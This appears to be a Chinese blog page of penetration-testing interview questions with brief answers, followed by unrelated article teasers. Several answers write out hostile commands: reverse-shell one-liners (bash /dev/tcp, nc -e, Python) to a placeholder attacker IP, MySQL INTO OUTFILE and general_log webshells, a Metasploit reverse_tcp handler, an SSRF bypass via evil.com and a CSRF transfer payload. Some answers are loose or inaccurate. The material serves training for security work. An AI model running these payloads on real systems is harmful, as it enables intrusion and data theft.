当前位置: 首页 > news >正文

2025年渗透测试面试题总结-拷打题库09(题目+回答)

news 来源:原创 2025/7/28 5:24:39

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库09

1. Linux系统加固降权思路

2. 系统后门检测工具

3. 绕过CDN获取真实IP

4. 给定网站的渗透思路

5. Windows与Linux提权思路

6. 开源组件高危漏洞(10+)

7. 反弹Shell命令及选择

8. CMD查询远程开放端口

9. IIS+PHP+MySQL渗透思路

10. 查询MySQL表列名

11. SQL头注入点

12. PHP命令执行函数

13. SSRF漏洞防御与绕过

14. MySQL写Shell方法

15. Metasploit反向监听命令

16. 应急响应步骤

17. 反向代理工具

18. 同源策略(SOP)

19. XSS的用途

20. XSS类型与防御

21. 存储型XSS原理

22. 快速发现XSS位置

23. DOM型XSS与反射型区别

24. 清空Referer的方法

25. Cookie的Security属性

26. XSS漏洞快速定位

27. XSS/CSRF/CRLF区别

28. CSRF不带Referer访问

2025年渗透测试面试题总结-拷打题库09

Windows、Linux、数据库的加固降权思路,任选其一
你使用什么工具来判断系统是否存在后门
如何绕过CDN获取目标网站真实IP,谈谈你的思路?
如果给你一个网站
谈一谈Windows系统与Linux系统提权的思路?
列举出您所知道的所有开源组件高危漏洞(十个以上)
反弹shell的常用命令?一般常反弹哪一种shell?为什么?
CMD命令行如何查询远程终端开放端口
服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路
请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句
SQL头注入点
php中命令执行涉及到的函数
SSRF漏洞的成因防御绕过
mysql写shell有几种方法
Metasploit打开反向监听的命令
应急响应的步骤
有哪些反向代理的工具?
什么是同源策略?
XSS能用来做什么?
XSS的三种类型,防御方法
存储型xss原理?
你怎么理解xss攻击?
如何快速发现xss位置?
Domxss原理/防范
DOM型XSS与反射型XSS区别?
如何使得前端referer为空
cookie参数,security干什么的
如果SRC上报了一个XSS漏洞,payload已经写入页面,但未给出具体位置,如何快速介入?
XSS,CSRF,CRLF比较容易弄混,说说三者的原理,防御方法
csrf如何不带referer访问

1. Linux系统加固降权思路

核心措施

  1. 最小化权限
    • 使用chmod 750限制敏感目录权限(如/etc)。
    • 通过visudo限制用户sudo权限。
  2. 禁用高危服务
    • 关闭不必要的服务:systemctl disable telnet
    • 禁用Root远程登录:修改/etc/ssh/sshd_configPermitRootLogin no
  3. 日志监控
    • 配置auditd监控敏感操作(如文件修改、用户提权)。

2. 系统后门检测工具

常用工具

  • Rootkit检测
    • rkhunter --check(扫描隐藏文件、异常进程)。
    • chkrootkit(检测已知Rootkit特征)。
  • 网络分析
    • netstat -antp(检查异常连接)。
    • lsof -i :可疑端口(定位进程)。

3. 绕过CDN获取真实IP

技术手段

  1. 历史DNS记录
    • 使用SecurityTrails查询目标域名历史解析记录。
  2. 子域名探测
    • 通过subfinder扫描子域名(部分子域名可能未配置CDN)。
  3. SSL证书匹配
    • Censys中搜索相同证书的IP地址。
  4. 邮件服务器溯源
    • 分析邮件头中Received字段获取服务器IP。

4. 给定网站的渗透思路

步骤

  1. 信息收集
    • Whois查询、目录扫描(dirsearch -u http://target)。
  2. 漏洞探测
    • SQL注入:sqlmap -u "http://target/?id=1"
    • 文件上传:测试绕过.htaccess限制。
  3. 权限提升
    • 利用内核漏洞(dirtycow)或配置错误(SUID)。

5. Windows与Linux提权思路

Windows提权

  • 服务路径滥用sc config VulnService binPath= "C:\shell.exe"
  • 令牌窃取:利用incognito模仿SYSTEM令牌。

Linux提权

  • SUID提权find / -perm -4000 2>/dev/null
  • 内核漏洞:利用CVE-2021-4034(Polkit提权)。

6. 开源组件高危漏洞(10+)

组件/漏洞CVE/影响
Log4j2CVE-2021-44228(RCE)
Apache Struts2S2-045(远程代码执行)
Spring CloudCVE-2022-22963(SpEL注入)
Fastjson反序列化RCE(1.2.24及以下)
DrupalCVE-2018-7600(Drupalgeddon2)
ThinkPHP多版本RCE(如5.x路由注入)
ElasticsearchCVE-2015-1427(Groovy脚本执行)
OpenSSLHeartbleed(CVE-2014-0160)
JenkinsCVE-2018-1000861(RCE)
NginxCVE-2013-2028(栈溢出)

7. 反弹Shell命令及选择

常用命令

  • Bashbash -i >& /dev/tcp/攻击IP/端口 0>&1(兼容性强)。
  • Netcatnc -e /bin/sh 攻击IP 端口
  • Python
    pythonimport socket,os,pty;s=socket.socket();s.connect((" 攻击IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

首选原因:Bash广泛支持且无需额外依赖。

8. CMD查询远程开放端口

命令

cmdnetstat -ano | findstr "ESTABLISHED" # 查看已连接端口 telnet 目标IP 端口 # 手动测试端口连通性

9. IIS+PHP+MySQL渗透思路

  1. 利用SQL注入
    • 通过UNION SELECT写入WebShell:SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.php'
  2. UDF提权
    • 上传恶意DLL并创建函数执行系统命令。
  3. 横向移动
    • 利用数据库凭证尝试登录其他服务(如SSH、远程桌面)。

10. 查询MySQL表列名

语句

sqlSELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users';

11. SQL头注入点

常见注入位置

  • HTTP头字段
    • User-AgentX-Forwarded-ForCookie
      示例
httpGET / HTTP/1.1 User-Agent: ' UNION SELECT 1,2,3 --

12. PHP命令执行函数

高危函数

  • system("whoami")
  • exec("cat /etc/passwd")
  • shell_exec("id")
  • passthru("ls")

13. SSRF漏洞防御与绕过

维度内容
成因未校验用户输入的URL参数
防御限制协议(仅HTTP/HTTPS)、禁用重定向
绕过使用http://127.0.0.1@evil.com 或IPv6

14. MySQL写Shell方法

  1. INTO OUTFILE:需FILE权限和可写路径。
  2. 日志文件
    sqlSET GLOBAL general_log_file='/var/www/shell.php'; SET GLOBAL general_log=ON;

15. Metasploit反向监听命令

bashmsfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击IP set LPORT 端口 run

16. 应急响应步骤

  1. 隔离网络:断开受感染主机网络。
  2. 取证分析:使用Volatility分析内存镜像。
  3. 清除后门:删除恶意文件并修复漏洞。
  4. 恢复监控:部署HIDS(如Osquery)。

17. 反向代理工具

  • Nginx:高性能,支持负载均衡。
  • Apache:模块化设计,兼容性强。
  • HAProxy:专用于TCP/HTTP流量分发。

18. 同源策略(SOP)

定义:浏览器限制脚本仅访问同协议、域名、端口的资源。
示例https://a.com 无法读取https://b.com 的Cookie。

19. XSS的用途

  1. 窃取Cookiedocument.cookie 发送至攻击者服务器。
  2. 钓鱼攻击:伪造登录框诱导用户输入凭证。
  3. 会话劫持:通过JavaScript操作用户会话。

20. XSS类型与防御

类型防御方法
存储型输入过滤(如htmlspecialchars
反射型输出编码 + 设置HttpOnly Cookie
DOM型避免eval(),使用textContent替代

21. 存储型XSS原理

流程:用户输入恶意脚本 → 存储至数据库 → 其他用户加载页面时执行。
示例:留言板插入<script>alert(1)</script>

22. 快速发现XSS位置

  1. 输入点测试
    • 表单、URL参数、HTTP头(如Referer)。
  2. 自动化扫描
    • 使用XSStrikeBurp Suite扫描反射点。

23. DOM型XSS与反射型区别

  • DOM型:漏洞在客户端解析阶段触发,无需服务器参与。
  • 反射型:恶意脚本经服务器返回后执行。

24. 清空Referer的方法

  1. HTML标签
    html<meta name="referrer" content="no-referrer">
  2. JavaScript
    javascriptwindow.location.href = 'http://target?data=xxx';

25. Cookie的Security属性

作用:仅通过HTTPS传输Cookie,防止中间人窃取。
设置Set-Cookie: session=123; Secure

26. XSS漏洞快速定位

  1. 代码审计:搜索innerHTMLdocument.write 等高风险函数。
  2. 输入模糊测试:插入<img src=x onerror=alert(1)>观察是否弹窗。

27. XSS/CSRF/CRLF区别

漏洞原理防御方法
XSS恶意脚本在用户浏览器执行输入编码 + CSP策略
CSRF伪造用户身份发起请求Token校验 + SameSite Cookie
CRLF注入换行符控制HTTP头/日志过滤\r\n + 严格校验输入

28. CSRF不带Referer访问

绕过方法

  1. 使用<meta>标签跳转
    html<meta http-equiv="refresh" content="0; url=http://bank.com/transfer?to=attacker">
  2. HTTPS页面发起请求:部分浏览器允许HTTPS页面不发送Referer。

相关文章:

2025年渗透测试面试题总结-拷打题库09(题目+回答)

网络安全领域各种资源&#xff0c;学习文档&#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具&#xff0c;欢迎关注。 目录 2025年渗透测试面试题总结-拷打题库09 1. Linux系统加固降权思路 2. 系统后门检测工具 3. 绕过CDN获…...

编程日记 2025/7/28 5:24:39

批量替换多个 Word 文档中的指定图片

在 Word 文档中&#xff0c;我们可以插入各种各样的图片&#xff0c;比如插入 logo、插入设计图、施工图等等。在某些情况下&#xff0c;我们也会碰到需要将 Word 文档中某张图片替换成其它图片的场景&#xff0c;比如将旧的 Logo 替换成新的 Logo。当我们有大量的 Word 文档需…...

编程日记 2025/7/27 5:31:53

海外版高端Apple科技汽车共享投资理财系统

这一款PHP海外版高端Apple、科技汽车、共享投资理财系统phplaravel框架。...

编程日记 2025/7/27 5:31:51

【Unity iOS打包】报错解决记录

打包报错1&#xff1a; Invalid Bundle. The bundle at ProductName.app/Frameworks/UnityFramework.framework contains disallowed file Frameworks. (ID: 87a95518-52e2-4ce0-983d-aab8d8006f11) 解决&#xff1a; Target > UnityFramework > Build Settings > Bu…...

编程日记 2025/7/27 5:31:49

新能源汽车零部件功率级测试方案搭建研究

摘要&#xff1a;本文旨在针对新能源汽车核心零部件功率级测试需求&#xff0c;提出基于Python与PyVISA的自动化测试方案。通过集成主流设备&#xff08;如Keysight 34980A、功率分析仪等&#xff09;&#xff0c;构建多协议兼容&#xff08;CAN、RS485等&#xff09;的测试平台…...

编程日记 2025/7/27 5:31:47

DeepSeek与WPS的动态数据可视化图表构建

摘要 在数据驱动决策的时代&#xff0c;动态数据可视化对于信息的高效传递与分析至关重要。本文聚焦于利用DeepSeek和WPS实现近百种动态数据可视化图表的技术应用&#xff0c;详细阐述其操作流程、技术原理及潜在价值。通过深入剖析这一技术组合的应用场景与实践意义&#xff0…...

编程日记 2025/7/27 5:31:44

XCTF-web(五)

Web_php_unserialize 当通过KaTeX parse error: Expected group after _ at position 42: …erialize&#xff0c;触发魔术方法_̲_wakeup和__destr…this->file)输出文件内容&#xff0c;若KaTeX parse error: Expected group after _ at position 17: …ile可控&#xff0…...

编程日记 2025/7/27 5:31:42

数字ic后端设计从入门到精通2(含fusion compiler, tcl教学)

上篇回顾 上一篇文章需要讨论了net,pin的基础用法&#xff0c;让我们来看一下高级一点的用法 instance current_instance current_instance 是 Synopsys 工具&#xff08;如 Fusion Compiler 或 Design Compiler&#xff09;中用于在设计层次结构中导航的关键命令。它允许用…...

编程日记 2025/7/27 5:31:40

Vue2集成ElementUI实现左侧菜单导航

文章目录 简介静态导航安装element-ui,vue-router,vuex编写router/index.jsmain.js中引入elementui,router编写左侧导航返回的菜单数据 动态导航编写router/index.js左侧菜单通过for循环生成通过for循环递归生成 store/index.jsmain.js中引入store登录页面代码菜单返回数据 总结…...

编程日记 2025/7/27 5:31:38

Flask API 项目 Swagger 版本打架不兼容

Flask API 项目 Swagger 版本打架不兼容 1. 问题背景 在使用 Flask 3.0.0 时遇到以下问题&#xff1a; 安装 flask_restful_swagger 时&#xff0c;它强制将 Flask 降级到 1.1.4&#xff0c;并导致其他依赖&#xff08;如 flask-sqlalchemy、flask-apispec&#xff09;出现版…...

编程日记 2025/7/27 5:31:36

spark和Hadoop的区别和联系

区别 计算模型 Hadoop&#xff1a;主要基于 MapReduce 计算模型&#xff0c;将任务分为 Map 和 Reduce 两个阶段&#xff0c;适合处理大规模的批处理数据&#xff0c;但在处理迭代式计算和交互式查询时性能相对较差。Spark&#xff1a;基于内存的分布式计算框架&#xff0c;采…...

编程日记 2025/7/27 5:31:34

Unity接入安卓SDK(2)接入方式

1 方式一&#xff1a;SDK打成aar形式放入Unity 把SDK编译成aar&#xff0c;然后把aar文件、manifest文件放入Unity工程的Assets/Plugins/Android目录下&#xff0c;以及libs下&#xff0c;没有的文件夹就自己新建. SDK的aar包也可以放入Assets/Plugins/Android目录中 其中一…...

编程日记 2025/7/27 5:31:32

【HDFS入门】深入解析DistCp:Hadoop分布式拷贝工具的原理与实践

目录 1 DistCp概述与应用场景 2 DistCp架构设计解析 2.1 系统架构图 2.2 执行流程图 3 DistCp核心技术原理 3.1 并行拷贝机制 3.2 断点续传实现原理 4 DistCp实战指南 4.1 常用命令示例 4.2 性能优化策略 5 异常处理与监控 5.1 常见错误处理流程 5.2 监控指标建议…...

编程日记 2025/7/27 5:31:30

电力MOSFET漏源过电压与窄脉冲自保护驱动电路

1 电力MOSFET的漏源过电压 2 窄脉冲自保护驱动电路说明 3 脉冲变压器设计说明 1 电力MOSFET的漏源过电压 如果器件接有感性负载,则当器件关断时,漏极电流的突变(di/dt)会产生比外部电源高的多的漏极尖峰电压,导致器件的击穿。电力MOSFET关断得越快,产生的过电压越高…...

编程日记 2025/7/26 7:56:58

【scikit-learn基础】--『监督学习』之 均值聚类

聚类算法属于无监督学习,其中最常见的是均值聚类,scikit-learn中,有两种常用的均值聚类算法: 一种是有名的K-means(也就是K-均值)聚类算法,这个算法几乎是学习聚类必会提到的算法; 另一个是均值偏移聚类,它与K-means各有千秋,只是针对的应用场景不太一样,但是知名度…...

编程日记 2025/7/27 5:31:25

Android 15强制edge-to-edge全面屏体验

一、背景 Edge-to-edge 全面屏体验并非 Android 15 才有的新功能&#xff0c;早在 Android 15 之前系统就已支持。然而&#xff0c;该功能推出多年来&#xff0c;众多应用程序依旧未针对全面屏体验进行适配。因此&#xff0c;在 Android 15 的更新中&#xff0c;Google 终于决…...

编程日记 2025/7/27 5:31:23

广州可信数据空间上线:1个城市枢纽+N个产业专区+高质量数据集(附28个数据集清单)

广州数据要素市场今日迎来历史性突破&#xff01;全国首个城市可信数据空间正式上线&#xff0c;首批28个高质量数据集同步出台&#xff0c;覆盖生物医药、智能装备、绿色低碳等12大产业领域&#xff0c;激活37个高价值场景。 一、广州城市可信数据空间&#xff1a;1个城市枢纽…...

编程日记 2025/7/27 20:40:38

AgentGPT开源程序可以在浏览器中组装、配置和部署自主人工智能代理

一、软件介绍 文末提供程序和源码下载学习 AgentGPT开源程序可以允许您配置和部署自主 AI 代理。命名您自己的定制 AI 并让它开始实现任何可想象的目标。它将通过思考要执行的任务、执行它们并从结果中学习来尝试达到目标。 二、开始使用 AgentGPT 入门最简单的方式是使用项目…...

编程日记 2025/7/27 5:31:19

前端笔记-Axios

Axios学习目标 Axios与API交互1、Axios配置与使用2、请求/响应拦截器3、API设计模式&#xff08;了解RESTful风格即可&#xff09; 学习参考&#xff1a;起步 | Axios中文文档 | Axios中文网 什么是Axios Axios 是一个基于 Promise 的现代化 HTTP 客户端库&#xff0c;专…...

编程日记 2025/7/27 5:31:17

【EasyPan】MySQL主键与索引核心作用解析

【EasyPan】项目常见问题解答&#xff08;自用&持续更新中…&#xff09;汇总版 MySQL主键与索引核心作用解析 一、主键&#xff08;PRIMARY KEY&#xff09;核心作用 1. 数据唯一标识 -- 创建表时定义主键 CREATE TABLE users (id INT AUTO_INCREMENT PRIMARY KEY,use…...

编程日记 2025/7/26 11:58:12

基于RK3588+FPGA+AI YOLO的无人船目标检测系统(一)概述

无人船在海洋监测、资源勘测、海上安全和科学研究等领域扮演着关键角色&#xff0c; 提升了海上任务的执行效率和安全性。在这一过程中&#xff0c;环境感知技术和目标检测 技术相辅相成&#xff0c;共同构建了系统的核心功能。随着人工智能行业的迅速发展&#xff0c;各 种…...

编程日记 2025/7/27 5:31:13

无人船 | 图解基于PID控制的路径跟踪算法(以全驱动无人艇WAMV为例)

目录 1 PID控制基本原理2 基于全驱动运动学的PID控制3 跟踪效果分析 1 PID控制基本原理 PID控制是一种常用的经典控制算法&#xff0c;其应用背景广泛&#xff0c;例如 工业自动化控制&#xff1a;温度控制、压力控制、流量控制、液位控制等过程控制系统多采用PID闭环&#x…...

编程日记 2025/7/27 5:31:10

为什么RPN经过的候选框处理后,要使用rcnn来进行候选框的分类和回归操作?

一句大白话总结&#xff1a;RPN是广撒网捕鱼&#xff0c;RCNN是细化鱼的分类和具体尺寸 在目标检测任务中&#xff0c;RPN&#xff08;区域提议网络&#xff09; 生成的候选框需要经过 RCNN&#xff08;如 Fast R-CNN、Faster R-CNN&#xff09; 进行分类和回归&#xff0c;这…...

编程日记 2025/7/27 3:56:03

代码实战保险花销预测

文章目录 摘要项目地址实战代码&#xff08;初级版&#xff09;实战代码&#xff08;进阶版&#xff09; 摘要 本文介绍了一个完整的机器学习流程项目&#xff0c;重点涵盖了多元线性回归的建模与评估方法。项目详细讲解了特征工程中的多项实用技巧&#xff0c;包括&#xff1…...

编程日记 2025/7/27 1:33:11

8.1 线性变换的思想

一、线性变换的概念 当一个矩阵 A A A 乘一个向量 v \boldsymbol v v 时&#xff0c;它将 v \boldsymbol v v “变换” 成另一个向量 A v A\boldsymbol v Av. 输入 v \boldsymbol v v&#xff0c;输出 T ( v ) A v T(\boldsymbol v)A\boldsymbol v T(v)Av. 变换 T T T…...

编程日记 2025/7/27 5:31:03

PythonWeb

参考&#xff1a;如何安装 Django |Django 文档 |姜戈 一、框架搭建 1、安装Django框架 pip3 install django 2、查看是否安装成功 pip3 show django 这样显示就是成功了 3、初始化项目 你想在哪个路径就 cd到哪个路径下输入一下命令就可以 django-admin startproject my…...

编程日记 2025/7/27 4:19:52

【大模型ChatGPT +DeepSeeK+python】最新AI赋能Python长时序植被遥感动态分析、物候提取、时空变异归因及RSEI生态评估

在遥感技术与人工智能深度融合的2025年&#xff0c;AI大模型正重塑长时序植被遥感数据分析范式。从Landsat/Sentinel卫星数据的智能化去云处理&#xff0c;到MODIS植被产品的AI辅助质量控制&#xff0c;以ChatGPT 、DeepSeeK为代表的大模型技术已成为提升遥感数据处理效率与精度…...

编程日记 2025/7/27 7:10:20

精益数据分析(11/126):辨别虚荣指标,挖掘数据真价值

精益数据分析&#xff08;11/126&#xff09;&#xff1a;辨别虚荣指标&#xff0c;挖掘数据真价值 大家好&#xff01;在创业和数据分析的学习道路上&#xff0c;我一直希望能和大家携手前行、共同进步。今天&#xff0c;咱们接着深入研读《精益数据分析》&#xff0c;这次聚…...

编程日记 2025/7/27 2:34:59

Time to event :Kaplan-Meier曲线、Log Rank检验与Shiny R

代码: # 创建数据框 data_a <- data.frame( usubjid = c(1- 1, 1- 2, 1- 3, 1- 4, 1- 5, 1- 6, 1- 7, 1- 8, 1- 9, 1-10, 2- 1, 2- 2, 2- 3, 2- 4, 2- 5, 2- 6, 2- 7, 2- 8, 2- 9, 2-10), cnsr = c(0,1,0,1,0,1,0,0,0,1,…...

编程日记 2025/7/27 5:31:01

线上救急-AWS限频

线上救急-AWS限频 问题 在一个天气炎热的下午&#xff0c;我正喝着可口可乐&#xff0c;悠闲地看着Cursor生成代码&#xff0c;忽然各大群聊中出现了加急➕全体的消息&#xff0c;当时就心里一咯噔&#xff0c;点开一看&#xff0c;果然&#xff0c;线上服务出问题&#xff0…...

编程日记 2025/7/27 5:30:59

JavaWeb学习打卡-Day1-分层解耦、Spring IOC、DI

三层架构 Controller&#xff08;控制层&#xff09;&#xff1a;接收前端发送的请求&#xff0c;对请求进行处理&#xff0c;并响应数据。Service&#xff08;业务逻辑层&#xff09;&#xff1a;处理具体的业务逻辑。DAO&#xff08;数据访问层/持久层&#xff09;&#xff…...

编程日记 2025/7/27 5:30:57

【LeetCode】1.两数之和

目录 &#x1f4da; 题目概要&#x1f9f0; 前置知识&#x1f6a7; 问题难点&#x1f511; 关键思路步骤拆解 &#x1f4bb; 代码实现代码注释 &#x1f4ca; 复杂度分析❗ 易错点与测试案例易错点测试案例 &#x1f517; 总结与扩展模式归纳核心思维 &#x1f4da; 题目概要 在…...

编程日记 2025/7/27 5:30:55

mongodb 存储数据的具体实现方式

MongoDB 存储数据的具体实现方式涉及数据模型、存储引擎、分片机制等多个核心模块&#xff0c;以下是其实现原理的详细分析&#xff1a; 一、数据模型 1.1 文档型数据模型‌ MongoDB 使用 BSON格式存储数据&#xff0c;支持键值对、嵌套文档和数组等复杂结构。 1.2 无模式设…...

编程日记 2025/7/26 22:11:47

【手机】vivo手机应用声音分离方案

文章目录 前言方案 前言 尝试分离vivo手机音乐与其他应用的声音 方案 最佳方案&#xff1a;网易云音乐设置内关闭音量均衡 上传不同的白噪音&#xff0c;成功 goodlock&#xff0c;主要适用于三星手机&#xff0c;vivo不一定适用 app volume control &#xff0c;可行...

编程日记 2025/7/27 5:30:53

多级缓存架构,让系统更快的跑起来!

大家好,今天,咱们来聊聊一个超级实用的话题——多级缓存架构。别一听“架构”俩字就头大,我保证,这篇文章既有趣又易懂,让你秒变缓存小达人! 一、多级缓存,为啥这么火? 在互联网的汪洋大海里,数据就是咱们的宝藏。但每次从数据库里捞数据,都跟挖宝藏似的,慢得很!…...

编程日记 2025/7/27 5:30:51

Vibracostic EDI 需求分析

Vibracostic 是德国Freudenberg集团旗下全球领先的减振与噪音控制技术公司&#xff0c;专注于为汽车及工业领域提供高效振动管理和隔音解决方案&#xff0c;客户涵盖宝马、奔驰、特斯拉等主流车企。 Vibracostic EDI 需求分析 供应商接收Vibracostic发来的DELFOR交付预测报文…...

编程日记 2025/7/27 5:30:50

基于超启发鲸鱼优化算法的混合神经网络多输入单输出回归预测模型 HHWOA-CNN-LSTM-Attention

基于超启发鲸鱼优化算法的混合神经网络多输入单输出回归预测模型 HHWOA-CNN-LSTM-Attention 随着人工智能技术的飞速发展&#xff0c;回归预测任务在很多领域得到了广泛的应用。尤其在金融、气象、医疗等领域&#xff0c;精确的回归预测模型能够为决策者提供宝贵的参考信息。为…...

编程日记 2025/7/27 5:30:48

Linux卸载删除gitlab

1、停止 gitlab服务 gitlab-ctl stop 2、卸载 gitlab&#xff08;社区版&#xff09; rpm -e gitlab-ce 或者 yum remove gitlab-ce 3、查看 gitlab 进程 ps aux | grep gitlab 4、杀掉gitlab service进程&#xff0c;该进程与runsvdir相关&#xff08;带有好多..........…...

编程日记 2025/7/27 5:30:46

高品质性价比之王-特伦斯便携钢琴V10

在电子钢琴选购过程中&#xff0c;预算与品质的平衡常常让消费者感到纠结。但特伦斯 V10 88 键可折叠电子钢琴的出现&#xff0c;为广大音乐爱好者带来了惊喜&#xff0c;亲民的价格实现了高品质的音乐体验。​ 先看便携性&#xff0c;同价位的电子钢琴大多体型庞大&#xff0c…...

编程日记 2025/7/27 7:10:18

解决方案评测|告别复杂配置!基于阿里云云原生应用开发平台CAP快速部署Bolt.diy

写在前面的话 突然看到上线了关于Bolt.new开源版本的解决方案测评&#xff0c;其实心里还是挺高兴的&#xff0c;我最早接触到Bolt.new的时候应该是在去年的11月份&#xff0c;当时是撰写了一篇名为一种基于通义千问prompt辅助Qwen2.5-coder-32bBolt.newv0Cursor的无代码对话…...

编程日记 2025/7/27 7:10:16

python测试框架之pytest

Pytest pytest 基础使用pytest安装pytest的测试case收集规则pytest - fixture的使用skip and xfailpytest - 属性标记测试函数pytest - 参数化测试pytest - mock/monkeypatch的使用pytest - 运行方式pytest - 运行方式/命令pytest - 处理测试失败的case pytest - 测试输出捕获 …...

编程日记 2025/7/27 7:10:13

uni-app 开发企业级小程序课程

课程大小&#xff1a;7.7G 课程下载&#xff1a;https://download.csdn.net/download/m0_66047725/90616393 更多资源下载&#xff1a;关注我 备注&#xff1a;缺少两个视频5-14 tabs组件进行基本的数据展示和搜索历史 处理searchData的删除操作 1-1导学.mp4 2-10小程序内…...

编程日记 2025/7/27 7:10:11

深度图可视化

import cv2# 1.读取一张深度图 depth_img cv2.imread("Dataset_depth/images/train/1112_0-rgb.png", cv2.IMREAD_UNCHANGED) print(depth_img.shape) cv2.imshow("depth", depth_img) # (960, 1280) print(depth_img)# 读取一张rgb的图片做对比 input_p…...

编程日记 2025/7/27 7:10:09

Java实现希尔排序算法

1. 希尔排序原理图解 希尔排序是插入排序的一种高效改进版本&#xff0c;通过比较和交换间隔较远的元素来减少数据的移动次数。以下是希尔排序的步骤&#xff1a; 1. 选择初始间隔&#xff1a;通常选择数组长度的一半作为初始间隔。 2. 分组和插入排序&#xff1a;将数组分成若…...

编程日记 2025/7/27 7:10:07

Apache RocketMQ 荣获 2024 开源创新榜单“年度开源项目

持续深耕 RocketMQ 领域&#xff0c;更多实战避坑指南、源码解析、最佳实践&#xff0c;已整理至「RocketMQ 中文社区」 &#x1f50d; 近日&#xff0c;以“新纪天工、开物焕彩——致敬开源的力量”为活动主题的“重大科技成就发布会&#xff08;首场&#xff09;”在国家科技…...

编程日记 2025/7/27 7:10:05

2025年智慧交通与能源技术国际会议(ITNET 2025)

The 2nd International Conference on Intelligent Transportation and Energy Technology 一、大会信息 会议简称&#xff1a;ITNET 2025 大会时间&#xff1a;(以官网为准&#xff09; 大会地点&#xff1a;中国南京 收录检索&#xff1a;提交Ei Compendex,CPCI,CNKI,Google…...

编程日记 2025/7/27 7:10:03

Spring Boot 集成 Redis 实战总结

Spring Boot 集成 Redis 实战总结 一、基础集成与配置 依赖引入 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-redis</artifactId> </dependency>默认使用 Lettuce 作为连接池&#xf…...

编程日记 2025/7/26 13:45:29

ubuntu18.04启动不了修复

参考: 虚拟机里的Ubuntu18.4启动时进入到grub rescue救援模式&#xff08;无法正常进入到系统&#xff09;&#xff0c;ls查看后只有一个硬盘和分区&#xff0c;且无法找到/boot/grub文件【已解决】_ubuntu grub rescue-CSDN博客 本人fdisk错误使用,导致了grub启动不了 第一步…...

编程日记 2025/7/27 7:09:59

人类行为的原动力是自我保存-来自ChatGPT

自我保存&#xff08;Self-Preservation&#xff09;确实可以说是人类行为最原始、最底层的驱动力。 简单来说&#xff1a; 无论我们做什么&#xff0c;表面看动机五花八门&#xff0c;实际上归根到底都绕不开活下去、保护自己。 &#x1f4a1; 从不同层面理解这个观点&#…...

编程日记 2025/7/27 7:09:57

退役淘汰的硬盘数据安全处置不可忽视-硬盘数据抹除清零

在信息化时代&#xff0c;硬盘作为数据存储的核心载体&#xff0c;其退役处理直接关系到信息安全&#xff0c;淘汰硬盘中往往留存大量敏感信息&#xff0c;若处置不当&#xff0c;极易引发数据泄露风险&#xff0c;造成难以挽回的损失。因此&#xff0c;建立规范的硬盘数据销毁…...

编程日记 2025/7/27 7:09:55